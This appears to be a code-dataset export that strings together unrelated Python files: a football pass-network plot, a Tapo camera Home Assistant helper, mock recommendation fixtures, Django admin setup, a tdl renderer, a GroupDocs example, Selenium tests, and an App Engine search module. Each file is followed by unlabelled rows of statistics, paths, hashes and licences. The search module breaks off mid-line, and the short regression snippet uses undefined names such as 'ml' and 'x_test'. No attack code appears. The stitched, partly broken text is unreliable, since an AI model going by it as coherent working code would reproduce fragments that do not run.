""" ============ Pass Network ============ This example shows how to plot passes between players in a set formation. """ import pandas as pd from mplsoccer.pitch import Pitch from matplotlib.colors import to_rgba import numpy as np from mplsoccer.statsbomb import read_event, EVENT_SLUG ############################################################################## # Set team and match info, and get event and tactics dataframes for the defined match_id match_id = 15946 team = 'Barcelona' opponent = 'Alavés (A), 2018/19 La Liga' event_dict = read_event(f'{EVENT_SLUG}/{match_id}.json', warn=False) players = event_dict['tactics_lineup'] events = event_dict['event'] ############################################################################## # Adding on the last tactics id and formation for the team for each event events.loc[events.tactics_formation.notnull(), 'tactics_id'] = events.loc[ events.tactics_formation.notnull(), 'id'] events[['tactics_id', 'tactics_formation']] = events.groupby('team_name')[[ 'tactics_id', 'tactics_formation']].ffill() ############################################################################## # Add the abbreviated player position to the players dataframe formation_dict = {1: 'GK', 2: 'RB', 3: 'RCB', 4: 'CB', 5: 'LCB', 6: 'LB', 7: 'RWB', 8: 'LWB', 9: 'RDM', 10: 'CDM', 11: 'LDM', 12: 'RM', 13: 'RCM', 14: 'CM', 15: 'LCM', 16: 'LM', 17: 'RW', 18: 'RAM', 19: 'CAM', 20: 'LAM', 21: 'LW', 22: 'RCF', 23: 'ST', 24: 'LCF', 25: 'SS'} players['position_abbreviation'] = players.player_position_id.map(formation_dict) ############################################################################## # Add on the subsitutions to the players dataframe, i.e. where players are subbed on # but the formation doesn't change sub = events.loc[events.type_name == 'Substitution', ['tactics_id', 'player_id', 'substitution_replacement_id', 'substitution_replacement_name']] players_sub = players.merge(sub.rename({'tactics_id': 'id'}, axis='columns'), on=['id', 'player_id'], how='inner', validate='1:1') players_sub = (players_sub[['id', 'substitution_replacement_id', 'position_abbreviation']] .rename({'substitution_replacement_id': 'player_id'}, axis='columns')) players = pd.concat([players, players_sub]) players.rename({'id': 'tactics_id'}, axis='columns', inplace=True) players = players[['tactics_id', 'player_id', 'position_abbreviation']] ############################################################################## # Add player position information to the events dataframe # add on the position the player was playing in the formation to the events dataframe events = events.merge(players, on=['tactics_id', 'player_id'], how='left', validate='m:1') # add on the position the receipient was playing in the formation to the events dataframe events = events.merge(players.rename({'player_id': 'pass_recipient_id'}, axis='columns'), on=['tactics_id', 'pass_recipient_id'], how='left', validate='m:1', suffixes=['', '_receipt']) ############################################################################## # Create dataframes for passes and player locations # get a dataframe with all passes mask_pass = (events.team_name == team) & (events.type_name == 'Pass') to_keep = ['id', 'match_id', 'player_id', 'player_name', 'outcome_name', 'pass_recipient_id', 'pass_recipient_name', 'x', 'y', 'end_x', 'end_y', 'tactics_id', 'tactics_formation', 'position_abbreviation', 'position_abbreviation_receipt'] passes = events.loc[mask_pass, to_keep].copy() print('Formations used by {} in match: '.format(team), 
passes['tactics_formation'].unique()) ############################################################################## # Filter passes by chosen formation, then group all passes and receipts to # calculate avg x, avg y, count of events for each slot in the formation formation = 433 passes_formation = passes[(passes.tactics_formation == formation) & (passes.position_abbreviation_receipt.notnull())].copy() passer_passes = passes_formation[['position_abbreviation', 'x', 'y']].copy() recipient_passes = passes_formation[['position_abbreviation_receipt', 'end_x', 'end_y']].copy() # rename columns to match those in passer_passes recipient_passes.rename({'position_abbreviation_receipt': 'position_abbreviation', 'end_x': 'x', 'end_y': 'y'}, axis='columns', inplace=True) # create a new dataframe containing all individual passes and receipts from passes_formation appended_passes = pd.concat(objs=[passer_passes, recipient_passes], ignore_index=True) average_locs_and_count = appended_passes.groupby('position_abbreviation').agg({ 'x': ['mean'], 'y': ['mean', 'count']}) average_locs_and_count.columns = ['x', 'y', 'count'] ############################################################################## # Group the passes by unique pairings of players and add the avg player positions to this dataframe # calculate the number of passes between each position (using min/ max so we get passes both ways) passes_formation['pos_max'] = passes_formation[['position_abbreviation', 'position_abbreviation_receipt']].max(axis='columns') passes_formation['pos_min'] = passes_formation[['position_abbreviation', 'position_abbreviation_receipt']].min(axis='columns') passes_between = passes_formation.groupby(['pos_min', 'pos_max']).id.count().reset_index() passes_between.rename({'id': 'pass_count'}, axis='columns', inplace=True) # add on the location of each player so we have the start and end positions of the lines passes_between = passes_between.merge(average_locs_and_count, left_on='pos_min', right_index=True) passes_between = passes_between.merge(average_locs_and_count, left_on='pos_max', right_index=True, suffixes=['', '_end']) ############################################################################## # Calculate the line width and marker sizes relative to the largest counts max_line_width = 18 max_marker_size = 3000 passes_between['width'] = passes_between.pass_count / passes_between.pass_count.max() * max_line_width average_locs_and_count['marker_size'] = (average_locs_and_count['count'] / average_locs_and_count['count'].max() * max_marker_size) ############################################################################## # Set color to make the lines more transparent when fewer passes are made min_transparency = 0.3 color = np.array(to_rgba('white')) color = np.tile(color, (len(passes_between), 1)) c_transparency = passes_between.pass_count / passes_between.pass_count.max() c_transparency = (c_transparency * (1 - min_transparency)) + min_transparency color[:, 3] = c_transparency ############################################################################## # Plotting pitch = Pitch(pitch_type='statsbomb', orientation='horizontal', pitch_color='#22312b', line_color='#c7d5cc', figsize=(16, 11), constrained_layout=True, tight_layout=False) fig, ax = pitch.draw() pass_lines = pitch.lines(passes_between.x, passes_between.y, passes_between.x_end, passes_between.y_end, lw=passes_between.width, color=color, zorder=1, ax=ax) pass_nodes = pitch.scatter(average_locs_and_count.x, average_locs_and_count.y, 
s=average_locs_and_count.marker_size, color='red', edgecolors='black', linewidth=1, alpha=1, ax=ax) for index, row in average_locs_and_count.iterrows(): pitch.annotate(row.name, xy=(row.x, row.y), c='white', va='center', ha='center', size=16, weight='bold', ax=ax) title = ax.set_title("{} {} Formation vs {}".format(team, formation, opponent), size=28, y=0.97, color='#c7d5cc') fig.set_facecolor("#22312b")
55.226027
116
0.615032
976
8,063
4.862705
0.276639
0.052044
0.032448
0.044037
0.187948
0.147493
0.099452
0.073325
0.073325
0.053519
0
0.014395
0.155649
8,063
145
117
55.606897
0.682726
0.183306
0
0
0
0
0.23193
0.082807
0
0
0
0
0
1
0
false
0.309524
0.059524
0
0.059524
0.011905
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
4c79ab828e049f734329ac9fd7817c526a06676d
6,777
py
Python
custom_components/tapo_control/utils.py
david-kalbermatten/HomeAssistant-Tapo-Control
3f9f8316cf7e176bb6f8d798d709f3c6d346a527
[ "Apache-2.0" ]
null
null
null
custom_components/tapo_control/utils.py
david-kalbermatten/HomeAssistant-Tapo-Control
3f9f8316cf7e176bb6f8d798d709f3c6d346a527
[ "Apache-2.0" ]
null
null
null
custom_components/tapo_control/utils.py
david-kalbermatten/HomeAssistant-Tapo-Control
3f9f8316cf7e176bb6f8d798d709f3c6d346a527
[ "Apache-2.0" ]
null
null
null
import onvif import os import asyncio import urllib.parse from onvif import ONVIFCamera from pytapo import Tapo from .const import ENABLE_MOTION_SENSOR, DOMAIN, LOGGER, CLOUD_PASSWORD from homeassistant.const import CONF_IP_ADDRESS, CONF_USERNAME, CONF_PASSWORD from homeassistant.components.onvif.event import EventManager from homeassistant.components.ffmpeg import DATA_FFMPEG from haffmpeg.tools import IMAGE_JPEG, ImageFrame def registerController(host, username, password): return Tapo(host, username, password) async def isRtspStreamWorking(hass, host, username, password): _ffmpeg = hass.data[DATA_FFMPEG] ffmpeg = ImageFrame(_ffmpeg.binary, loop=hass.loop) username = urllib.parse.quote_plus(username) password = urllib.parse.quote_plus(password) streaming_url = f"rtsp://{username}:{password}@{host}:554/stream1" image = await asyncio.shield( ffmpeg.get_image( streaming_url, output_format=IMAGE_JPEG, ) ) return not image == b"" async def initOnvifEvents(hass, host, username, password): device = ONVIFCamera( host, 2020, username, password, f"{os.path.dirname(onvif.__file__)}/wsdl/", no_cache=True, ) try: await device.update_xaddrs() device_mgmt = device.create_devicemgmt_service() device_info = await device_mgmt.GetDeviceInformation() if "Manufacturer" not in device_info: raise Exception("Onvif connection has failed.") return device except Exception: pass return False async def getCamData(hass, controller): camData = {} presets = await hass.async_add_executor_job(controller.isSupportingPresets) camData["user"] = controller.user camData["basic_info"] = await hass.async_add_executor_job(controller.getBasicInfo) camData["basic_info"] = camData["basic_info"]["device_info"]["basic_info"] try: motionDetectionData = await hass.async_add_executor_job( controller.getMotionDetection ) motion_detection_enabled = motionDetectionData["enabled"] if motionDetectionData["digital_sensitivity"] == "20": motion_detection_sensitivity = "low" elif motionDetectionData["digital_sensitivity"] == "50": motion_detection_sensitivity = "normal" elif motionDetectionData["digital_sensitivity"] == "80": motion_detection_sensitivity = "high" else: motion_detection_sensitivity = None except Exception: motion_detection_enabled = None motion_detection_sensitivity = None camData["motion_detection_enabled"] = motion_detection_enabled camData["motion_detection_sensitivity"] = motion_detection_sensitivity try: privacy_mode = await hass.async_add_executor_job(controller.getPrivacyMode) privacy_mode = privacy_mode["enabled"] except Exception: privacy_mode = None camData["privacy_mode"] = privacy_mode try: alarmData = await hass.async_add_executor_job(controller.getAlarm) alarm = alarmData["enabled"] alarm_mode = alarmData["alarm_mode"] except Exception: alarm = None alarm_mode = None camData["alarm"] = alarm camData["alarm_mode"] = alarm_mode try: commonImageData = await hass.async_add_executor_job(controller.getCommonImage) day_night_mode = commonImageData["image"]["common"]["inf_type"] except Exception: day_night_mode = None camData["day_night_mode"] = day_night_mode try: led = await hass.async_add_executor_job(controller.getLED) led = led["enabled"] except Exception: led = None camData["led"] = led try: auto_track = await hass.async_add_executor_job(controller.getAutoTrackTarget) auto_track = auto_track["enabled"] except Exception: auto_track = None camData["auto_track"] = auto_track if presets: camData["presets"] = presets else: camData["presets"] = {} return camData async def update_listener(hass, entry): """Handle options 
update.""" host = entry.data.get(CONF_IP_ADDRESS) username = entry.data.get(CONF_USERNAME) password = entry.data.get(CONF_PASSWORD) motionSensor = entry.data.get(ENABLE_MOTION_SENSOR) cloud_password = entry.data.get(CLOUD_PASSWORD) try: if cloud_password != "": tapoController = await hass.async_add_executor_job( registerController, host, "admin", cloud_password ) else: tapoController = await hass.async_add_executor_job( registerController, host, username, password ) hass.data[DOMAIN][entry.entry_id]["controller"] = tapoController except Exception: LOGGER.error( "Authentication to Tapo camera failed." + " Please restart the camera and try again." ) for entity in hass.data[DOMAIN][entry.entry_id]["entities"]: entity._host = host entity._username = username entity._password = password if hass.data[DOMAIN][entry.entry_id]["events"]: await hass.data[DOMAIN][entry.entry_id]["events"].async_stop() if hass.data[DOMAIN][entry.entry_id]["motionSensorCreated"]: await hass.config_entries.async_forward_entry_unload(entry, "binary_sensor") hass.data[DOMAIN][entry.entry_id]["motionSensorCreated"] = False if motionSensor: await setupOnvif(hass, entry, host, username, password) async def setupOnvif(hass, entry, host, username, password): hass.data[DOMAIN][entry.entry_id]["eventsDevice"] = await initOnvifEvents( hass, host, username, password ) if hass.data[DOMAIN][entry.entry_id]["eventsDevice"]: hass.data[DOMAIN][entry.entry_id]["events"] = EventManager( hass, hass.data[DOMAIN][entry.entry_id]["eventsDevice"], f"{entry.entry_id}_tapo_events", ) hass.data[DOMAIN][entry.entry_id]["eventsSetup"] = await setupEvents( hass, entry ) async def setupEvents(hass, entry): if not hass.data[DOMAIN][entry.entry_id]["events"].started: events = hass.data[DOMAIN][entry.entry_id]["events"] if await events.async_start(): if not hass.data[DOMAIN][entry.entry_id]["motionSensorCreated"]: hass.data[DOMAIN][entry.entry_id]["motionSensorCreated"] = True hass.async_create_task( hass.config_entries.async_forward_entry_setup( entry, "binary_sensor" ) ) return True else: return False
34.93299
86
0.665044
735
6,777
5.910204
0.22585
0.029466
0.044199
0.065608
0.293738
0.269337
0.234346
0.080571
0.049724
0
0
0.00271
0.237716
6,777
193
87
35.11399
0.838173
0
0
0.156627
0
0
0.110979
0.024596
0
0
0
0
0
1
0.006024
false
0.114458
0.066265
0.006024
0.114458
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
d5b2ddd3598b303bcb8230980f8ef5b2b4388ef0
5,712
py
Python
src/tests/unit/fixtures/endpoint_standard/mock_recommendation.py
fslds/carbon-black-cloud-sdk-python
248a3c63d6b36d6fcdbcb3f51fb7751f062ed372
[ "MIT" ]
24
2020-10-16T22:07:38.000Z
2022-03-24T14:58:03.000Z
src/tests/unit/fixtures/endpoint_standard/mock_recommendation.py
fslds/carbon-black-cloud-sdk-python
248a3c63d6b36d6fcdbcb3f51fb7751f062ed372
[ "MIT" ]
63
2020-10-26T18:26:15.000Z
2022-03-31T17:31:02.000Z
src/tests/unit/fixtures/endpoint_standard/mock_recommendation.py
fslds/carbon-black-cloud-sdk-python
248a3c63d6b36d6fcdbcb3f51fb7751f062ed372
[ "MIT" ]
10
2020-11-09T11:54:23.000Z
2022-03-24T20:44:00.000Z
"""Mock responses for recommendations.""" SEARCH_REQ = { "criteria": { "policy_type": ['reputation_override'], "status": ['NEW', 'REJECTED', 'ACCEPTED'], "hashes": ['111', '222'] }, "rows": 50, "sort": [ { "field": "impact_score", "order": "DESC" } ] } SEARCH_RESP = { "results": [ { "recommendation_id": "91e9158f-23cc-47fd-af7f-8f56e2206523", "rule_type": "reputation_override", "policy_id": 0, "new_rule": { "override_type": "SHA256", "override_list": "WHITE_LIST", "sha256_hash": "32d2be78c00056b577295aa0943d97a5c5a0be357183fcd714c7f5036e4bdede", "filename": "XprotectService", "application": { "type": "EXE", "value": "FOO" } }, "workflow": { "status": "NEW", "changed_by": "[email protected]", "create_time": "2021-05-18T16:37:07.000Z", "update_time": "2021-08-31T20:53:39.000Z", "comment": "Ours is the fury" }, "impact": { "org_adoption": "LOW", "impacted_devices": 45, "event_count": 76, "impact_score": 0, "update_time": "2021-05-18T16:37:07.000Z" } }, { "recommendation_id": "bd50c2b2-5403-4e9e-8863-9991f70df026", "rule_type": "reputation_override", "policy_id": 0, "new_rule": { "override_type": "SHA256", "override_list": "WHITE_LIST", "sha256_hash": "0bbc082cd8b3ff62898ad80a57cb5e1f379e3fcfa48fa2f9858901eb0c220dc0", "filename": "sophos ui.msi" }, "workflow": { "status": "NEW", "changed_by": "[email protected]", "create_time": "2021-05-18T16:37:07.000Z", "update_time": "2021-08-31T20:53:09.000Z", "comment": "Always pay your debts" }, "impact": { "org_adoption": "HIGH", "impacted_devices": 8, "event_count": 25, "impact_score": 0, "update_time": "2021-05-18T16:37:07.000Z" } }, { "recommendation_id": "0d9da444-cfa7-4488-9fad-e2abab099b68", "rule_type": "reputation_override", "policy_id": 0, "new_rule": { "override_type": "SHA256", "override_list": "WHITE_LIST", "sha256_hash": "2272c5221e90f9762dfa38786da01b36a28a7da5556b07dec3523d1abc292124", "filename": "mimecast for outlook 7.8.0.125 (x86).msi" }, "workflow": { "status": "NEW", "changed_by": "[email protected]", "create_time": "2021-05-18T16:37:07.000Z", "update_time": "2021-08-31T15:13:40.000Z", "comment": "Winter is coming" }, "impact": { "org_adoption": "MEDIUM", "impacted_devices": 45, "event_count": 79, "impact_score": 0, "update_time": "2021-05-18T16:37:07.000Z" } } ], "num_found": 3 } ACTION_INIT = { "recommendation_id": "0d9da444-cfa7-4488-9fad-e2abab099b68", "rule_type": "reputation_override", "policy_id": 0, "new_rule": { "override_type": "SHA256", "override_list": "WHITE_LIST", "sha256_hash": "2272c5221e90f9762dfa38786da01b36a28a7da5556b07dec3523d1abc292124", "filename": "mimecast for outlook 7.8.0.125 (x86).msi" }, "workflow": { "status": "NEW", "changed_by": "[email protected]", "create_time": "2021-05-18T16:37:07.000Z", "update_time": "2021-08-31T15:13:40.000Z", "comment": "Winter is coming" }, "impact": { "org_adoption": "MEDIUM", "impacted_devices": 45, "event_count": 79, "impact_score": 0, "update_time": "2021-05-18T16:37:07.000Z" } } ACTION_REQS = [ { "action": "ACCEPT", "comment": "Alpha" }, { "action": "RESET" }, { "action": "REJECT", "comment": "Charlie" }, ] ACTION_REFRESH_SEARCH = { "criteria": { "status": ['NEW', 'REJECTED', 'ACCEPTED'], "policy_type": ['reputation_override'] }, "rows": 50 } ACTION_SEARCH_RESP = { "results": [ACTION_INIT], "num_found": 1 } ACTION_REFRESH_STATUS = ['ACCEPTED', 'NEW', 'REJECTED'] ACTION_INIT_ACCEPTED = { "recommendation_id": "0d9da444-cfa7-4488-9fad-e2abab099b68", "rule_type": "reputation_override", "policy_id": 0, "new_rule": { "override_type": "SHA256", "override_list": "WHITE_LIST", 
"sha256_hash": "2272c5221e90f9762dfa38786da01b36a28a7da5556b07dec3523d1abc292124", "filename": "mimecast for outlook 7.8.0.125 (x86).msi" }, "workflow": { "status": "ACCEPTED", "ref_id": "e9410b754ea011ebbfd0db2585a41b07", "changed_by": "[email protected]", "create_time": "2021-05-18T16:37:07.000Z", "update_time": "2021-08-31T15:13:40.000Z", "comment": "Winter is coming" }, "impact": { "org_adoption": "MEDIUM", "impacted_devices": 45, "event_count": 79, "impact_score": 0, "update_time": "2021-05-18T16:37:07.000Z" } }
31.043478
98
0.500525
499
5,712
5.517034
0.266533
0.043589
0.036324
0.054486
0.671268
0.652016
0.641482
0.641482
0.641482
0.641482
0
0.179021
0.345763
5,712
183
99
31.213115
0.557667
0.006127
0
0.494253
0
0
0.495151
0.16505
0
0
0
0
0
1
0
false
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
d5b96915a161658ab58f977d3518461eda8624b2
1,407
py
Python
main/admin.py
sinahmr/childf
4e01f46867425b36b6431713b79debf585d69d37
[ "MIT" ]
null
null
null
main/admin.py
sinahmr/childf
4e01f46867425b36b6431713b79debf585d69d37
[ "MIT" ]
null
null
null
main/admin.py
sinahmr/childf
4e01f46867425b36b6431713b79debf585d69d37
[ "MIT" ]
null
null
null
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin as DjangoUserAdmin
from django.contrib.auth.models import Group
from django.utils.translation import ugettext_lazy as _

from main.models import UserInfo, User, Child, Volunteer, Donor, Letter, Need, PurchaseForInstitute, PurchaseForNeed, \
    Activity, OngoingUserInfo


@admin.register(User)
class UserAdmin(DjangoUserAdmin):
    class UserInfoInline(admin.TabularInline):
        model = UserInfo
        extra = 1
        max_num = 1

    fieldsets = (
        (None, {'fields': ('email', 'password')}),
        (_('Permissions'), {'fields': ('is_active', 'is_staff', 'is_superuser')}),
        (_('Important dates'), {'fields': ('last_login', 'date_joined')}),
    )
    add_fieldsets = (
        (None, {
            'classes': ('wide',),
            'fields': ('email', 'password1', 'password2'),
        }),
    )
    list_display = ('email', 'userinfo', 'is_staff')
    search_fields = ('email', 'userinfo__first_name', 'userinfo__last_name')
    ordering = ('email',)
    inlines = [UserInfoInline]


admin.site.unregister(Group)
admin.site.register(Child)
admin.site.register(Volunteer)
admin.site.register(Donor)
admin.site.register(Letter)
admin.site.register(Need)
admin.site.register(PurchaseForInstitute)
admin.site.register(PurchaseForNeed)
admin.site.register(Activity)
admin.site.register(OngoingUserInfo)
31.977273
119
0.687278
149
1,407
6.355705
0.442953
0.095037
0.161563
0.044351
0
0
0
0
0
0
0
0.003428
0.170576
1,407
43
120
32.72093
0.808055
0
0
0
0
0
0.154229
0
0
0
0
0
0
1
0
false
0.054054
0.162162
0
0.378378
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
d5b9d02c239d39cdf1dcff5670b5cc5e359e73a5
2,515
py
Python
hunting/display/render.py
MoyTW/RL_Arena_Experiment
fb79c67576cd4de3e4a58278b4515098f38fb584
[ "MIT" ]
null
null
null
hunting/display/render.py
MoyTW/RL_Arena_Experiment
fb79c67576cd4de3e4a58278b4515098f38fb584
[ "MIT" ]
null
null
null
hunting/display/render.py
MoyTW/RL_Arena_Experiment
fb79c67576cd4de3e4a58278b4515098f38fb584
[ "MIT" ]
null
null
null
import tdl import time import hunting.constants as c class Renderer: def __init__(self, main_console=None, level_display_width=c.SCREEN_WIDTH, level_display_height=c.SCREEN_HEIGHT): if main_console is None: self.main_console = tdl.init(level_display_width, level_display_height, 'From Renderer Default Constructor') else: self.main_console = main_console self.level_display_width = level_display_width self.level_display_height = level_display_height self._level_console = tdl.Console(level_display_width, level_display_height) def _render_level(self, con, level): for x in range(level.width): for y in range(level.height): if level[x][y].blocks is not False: self._level_console.draw_rect(x, y, 1, 1, None, bg=[120, 0, 50]) else: self._level_console.draw_rect(x, y, 1, 1, None, bg=[30, 255, 30]) # TODO: This is pretty hacky! i = 1 for o in level._all_objects: if o.faction == '1': # TODO: Better faction implementation! color = [255, 0, 0] else: color = [0, 0, 255] self._level_console.draw_char(o.x, o.y, i, color) i += 1 con.blit(self._level_console) def render_all(self, level): self._render_level(self.main_console, level) tdl.flush() def clear(self, level): for o in level._all_objects: self._level_console.draw_char(o.x, o.y, ' ') def render_event(self, level, event): if event[c.EVENT_TYPE] == c.MOVEMENT_EVENT: # Clear previous location self._level_console.draw_char(event[c.MOVEMENT_PREV_X], event[c.MOVEMENT_PREV_Y], ' ', bg=[0, 15, 7]) # Retrieve faction and color o = level.get_object_by_id(event[c.OBJ_ID]) if o.faction == '1': # TODO: Better faction implementation! color = [255, 0, 0] else: color = [0, 0, 255] self._level_console.draw_char(event[c.OBJ_X], event[c.OBJ_Y], o.faction, fg=color) elif event[c.EVENT_TYPE] == c.OBJECT_DESTRUCTION_EVENT: self._level_console.draw_char(event[c.OBJ_X], event[c.OBJ_Y], ' ', bg=[0, 15, 7]) # Render self.main_console.blit(self._level_console) tdl.flush() def visualize(level, show_time=1): Renderer().render_all(level) time.sleep(show_time)
36.985294
120
0.603579
350
2,515
4.08
0.234286
0.094538
0.112045
0.098039
0.392157
0.340336
0.261905
0.240896
0.240896
0.218487
0
0.02784
0.285885
2,515
68
121
36.985294
0.767261
0.063221
0
0.28
0
0
0.01617
0
0
0
0
0.014706
0
1
0.12
false
0
0.06
0
0.2
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
1
d5bbaeac59cde7e794de669fe4ec0942d528fc8d
699
py
Python
Examples/PagesOperations/MovePage.py
groupdocs-merger-cloud/groupdocs-merger-cloud-python-samples
af736c94240eeefef28bd81012c96ab2ea779088
[ "MIT" ]
null
null
null
Examples/PagesOperations/MovePage.py
groupdocs-merger-cloud/groupdocs-merger-cloud-python-samples
af736c94240eeefef28bd81012c96ab2ea779088
[ "MIT" ]
null
null
null
Examples/PagesOperations/MovePage.py
groupdocs-merger-cloud/groupdocs-merger-cloud-python-samples
af736c94240eeefef28bd81012c96ab2ea779088
[ "MIT" ]
null
null
null
# Import modules
import groupdocs_merger_cloud

from Common import Common


# This example demonstrates how to move document page to a new position
class MovePage:

    @classmethod
    def Run(cls):
        pagesApi = groupdocs_merger_cloud.PagesApi.from_config(Common.GetConfig())

        options = groupdocs_merger_cloud.MoveOptions()
        options.file_info = groupdocs_merger_cloud.FileInfo("WordProcessing/four-pages.docx")
        options.output_path = "Output/move-pages.docx"
        options.page_number = 1
        options.new_page_number = 2

        result = pagesApi.move(groupdocs_merger_cloud.MoveRequest(options))

        print("Output file path = " + result.path)
36.789474
93
0.711016
83
699
5.795181
0.53012
0.155925
0.2079
0
0
0
0
0
0
0
0
0.00363
0.211731
699
19
94
36.789474
0.869328
0.120172
0
0
0
0
0.115824
0.084829
0
0
0
0
0
1
0.076923
false
0
0.153846
0
0.307692
0.076923
0
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
d5bbb325b8069e32756e2756a7150bcc81d9e24f
221
py
Python
src/models/predict_model.py
joseluistello/Regression-Analysis-Apple-Data
85952edd22ba8c382f43357efc510763185fd6d1
[ "MIT" ]
null
null
null
src/models/predict_model.py
joseluistello/Regression-Analysis-Apple-Data
85952edd22ba8c382f43357efc510763185fd6d1
[ "MIT" ]
null
null
null
src/models/predict_model.py
joseluistello/Regression-Analysis-Apple-Data
85952edd22ba8c382f43357efc510763185fd6d1
[ "MIT" ]
null
null
null
y_pred=ml.predict(x_test)
print(y_pred)

from sklearn.metrics import r2_score
r2_score(y_test,y_pred)

pred_y_df=pd.DataFrame({'Actual Value':y_test,'Predicted Value':y_pred, 'Difference': y_test-y_pred})
pred_y_df[0:20]
24.555556
101
0.791855
44
221
3.636364
0.5
0.15625
0.075
0.125
0.2125
0.2125
0.2125
0
0
0
0
0.024272
0.067873
221
9
102
24.555556
0.752427
0
0
0
0
0
0.166667
0
0
0
0
0
0
1
0
false
0
0.166667
0
0.166667
0.166667
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
d5c40e739be914cd8694a4a6735e497e975d7778
1,791
py
Python
tests/test_webdriver_chrome.py
kidosoft/splinter
6d5052fd73c0a626299574cea76924e367c67faa
[ "BSD-3-Clause" ]
1
2016-09-21T19:32:47.000Z
2016-09-21T19:32:47.000Z
tests/test_webdriver_chrome.py
kidosoft/splinter
6d5052fd73c0a626299574cea76924e367c67faa
[ "BSD-3-Clause" ]
null
null
null
tests/test_webdriver_chrome.py
kidosoft/splinter
6d5052fd73c0a626299574cea76924e367c67faa
[ "BSD-3-Clause" ]
1
2019-12-02T15:19:07.000Z
2019-12-02T15:19:07.000Z
# -*- coding: utf-8 -*- # Copyright 2013 splinter authors. All rights reserved. # Use of this source code is governed by a BSD-style # license that can be found in the LICENSE file. import os import unittest from splinter import Browser from .fake_webapp import EXAMPLE_APP from .base import WebDriverTests from selenium.common.exceptions import WebDriverException def chrome_installed(): try: Browser("chrome") except WebDriverException: return False return True class ChromeBrowserTest(WebDriverTests, unittest.TestCase): @classmethod def setUpClass(cls): cls.browser = Browser("chrome") @classmethod def tearDownClass(cls): cls.browser.quit() def setUp(self): self.browser.visit(EXAMPLE_APP) def test_attach_file(self): "should provide a way to change file field value" file_path = os.path.join( os.path.abspath(os.path.dirname(__file__)), 'mockfile.txt' ) self.browser.attach_file('file', file_path) self.browser.find_by_name('upload').click() html = self.browser.html self.assertIn('text/plain', html) self.assertIn(open(file_path).read().encode('utf-8'), html) def test_should_support_with_statement(self): with Browser('chrome') as internet: pass class ChromeBrowserFullscreenTest(WebDriverTests, unittest.TestCase): @classmethod def setUpClass(cls): cls.browser = Browser("chrome", fullscreen=True) @classmethod def tearDownClass(cls): cls.browser.quit() def setUp(self): self.browser.visit(EXAMPLE_APP) def test_should_support_with_statement(self): with Browser('chrome', fullscreen=True) as internet: pass
25.225352
69
0.672808
213
1,791
5.539906
0.455399
0.055085
0.044068
0.069492
0.372034
0.372034
0.372034
0.372034
0.372034
0.372034
0
0.004357
0.231156
1,791
70
70
25.585714
0.852578
0.123953
0
0.382979
0
0
0.070676
0
0
0
0
0
0.042553
1
0.212766
false
0.042553
0.12766
0
0.425532
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1
d5e19c75c00ba0d6d2f1c4a0eb15f229a98c4904
7,259
py
Python
webapp/search.py
henchan/memfinity
3860985e29b203f0569f60eea68ffb22aaf34b1f
[ "MIT" ]
null
null
null
webapp/search.py
henchan/memfinity
3860985e29b203f0569f60eea68ffb22aaf34b1f
[ "MIT" ]
null
null
null
webapp/search.py
henchan/memfinity
3860985e29b203f0569f60eea68ffb22aaf34b1f
[ "MIT" ]
null
null
null
"""High-level search API. This module implements application-specific search semantics on top of App Engine's search API. There are two chief operations: querying for entities, and managing entities in the search facility. Add and remove Card entities in the search facility: insert_cards([models.Card]) delete_cards([models.Card]) Query for Card entities: query_cards(query_string, limit=20) -> search.SearchResults The results items will have the following fields: user_key, user_nickname, front, back, info, tag (repeated), added, modified, source_url The query_string is free-form, as a user would enter it, and passes through a custom query processor before the query is submitted to App Engine. Notably, pass @username to restrict the query to entities authored by username, and #tag to restrict the query to only documents matching the given tag. Multiple @usernames or #tags result in an OR query. """ import re from google.appengine.api import search from google.appengine.ext import ndb QUERY_LIMIT = 20 CARD_INDEX_NAME = 'cards' # Increase this value when _card2doc changes its format so that # queries can determine the data available on returned documents. CARD_DOCUMENT_VERSION = '1' # Ensure we're under the 2000 character limit from # https://developers.google.com/appengine/docs/python/search/query_strings MAX_QUERY_LEN = 200 # TODO(chris): it would be better if this module didn't know about # specific entity types, but instead defined a protocol to get # metadata from an entity and generate a document. def insert_cards(cards): """Insert or update models.Card entities in the search facility.""" # TODO(chris): should we allow more than 200 cards per call? assert len(cards) <= 200, len(cards) card_docs = map(_card2doc, cards) index = search.Index(name=CARD_INDEX_NAME) index.put(card_docs) def delete_cards(cards): """Delete models.Card entities from the search facility.""" index = search.Index(name=CARD_INDEX_NAME) card_doc_ids = map(_card2docid, cards) index.delete(card_doc_ids) def query_cards(query_str, limit=QUERY_LIMIT, web_safe_cursor=None, ids_only=False, user_key=None): """Return the search.SearchResults for a query. ids_only is useful because the returned document IDs are url-safe keys for models.Card entities. """ if web_safe_cursor: cursor = search.Cursor(web_safe_string=web_safe_cursor) else: cursor = None index = search.Index(name=CARD_INDEX_NAME) query_processor = _QueryProcessor( query_str, name_field='user_nickname', tag_field='tag', private_field='private', user_key_field='user_key', query_options=search.QueryOptions(limit=limit, cursor=cursor, ids_only=ids_only), user_key=user_key) search_results = index.search(query_processor.query()) # TODO(chris): should this return partially-instantiated # models.Card instances instead of leaking implementation details # like we do now? return search_results def _card2doc(card): # TODO(chris): should we include all fields that would be needed # for rendering a search results item to avoid entity lookup? tag_fields = [search.AtomField(name='tag', value=tag) for tag in 